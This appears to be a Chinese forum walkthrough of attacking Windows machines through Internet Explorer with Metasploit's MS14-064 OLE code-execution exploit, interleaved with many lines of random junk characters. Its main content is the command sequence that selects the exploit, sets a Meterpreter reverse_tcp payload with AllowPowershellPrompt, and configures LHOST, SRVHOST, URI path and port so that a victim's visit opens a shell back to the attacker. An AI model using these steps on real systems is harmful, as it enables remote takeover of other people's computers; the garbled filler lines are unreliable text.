" `% M+ E i5 j4 z
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
! }2 ]8 e) l2 Z) p3 B# R4 }) U
2 U% X9 T/ v( \- T
% R: }/ v; e+ h" j 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
9 y9 r1 l7 r/ S: j2 U) a
- N/ _& O" e) Q, H- d7 @1 X9 J( ?% E! q, n5 R L2 _
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
8 h: e' x2 S8 p3 |2 L" [
. F8 r/ @2 C& w
! ~( K- ?+ P. n A* J# S. W5 l
set AllowPowershellPrompt true" u! `/ X: I' M6 p; q' w
0 K: B$ M5 i! {! K0 B# v; ?. z$ ~' T. Q$ \
Set LHOST 192.168.0.109" z2 k9 \ [! D4 R: v/ F
5 H- |( D1 l C7 [
4 k4 S' S6 V3 ^# v( s set SRVHOST 192.168.0.109
1 |& H/ d" t1 i: a/ ~; l' y6 O; m
, F! o' I8 b2 J M$ I& b" J' e
1 h6 i$ U+ W) o) L5 r) W Set uripath share+ u6 @* O1 C% `' `) u( }8 `6 d
3 I; `- N' ^( Q; e/ A$ H+ Z! {% ?- T$ ]
' F1 J8 H1 G! Q7 Y; J( E; | d Set srvport 80
1 [1 \" _6 B I, T/ v; ~* D/ C9 d1 J$ Z
- m7 f# [/ T; O
$ f+ `5 ?( g. `3 R
# ^/ c; x& E: z$ i, q; X
2 s, K# f7 |$ W6 _
9 ~$ D, M4 k+ f4 \ 2 o% P4 j. c% U
* ^+ y- H7 n, G
# R5 B9 r5 {* b* z/ a2 Q
$ x: O+ V1 y, s c0 }8 s
0 t8 d$ n, Y M# a0 l4 |
% \3 {1 `+ G3 c6 z3 k7 t6 n$ J 4 ]4 G& L1 K- Q+ L
" @ C9 j$ _3 d, E( h2 |) [9 e, r
5 P) I- u @; B6 Q) Z0 d* V
; J% K2 ]1 t6 c# D9 l2 X1 _
. ^1 \: |! D) q) d, i7 p
2 I% j; q, ?. B& h7 S 下面我们来访问本地地址如图:: z+ j0 J1 Y* a* P4 x; f6 m- C4 {; b
1 P+ \* C& ]) C/ ^+ j& n; a$ k$ J$ y: ~$ e. }
/ E( d* U0 S8 y: j) ^9 `
g& L# h$ i7 a0 v
, [! V- n% Y) v. j 8 P4 \6 C2 X: ^0 Q/ g# C# X
* g; X' Q" g0 C8 x/ c9 x& f( M
7 `$ y2 J2 Z8 ^) Q% A7 p, I
( T% n) }! }8 @" _3 E& I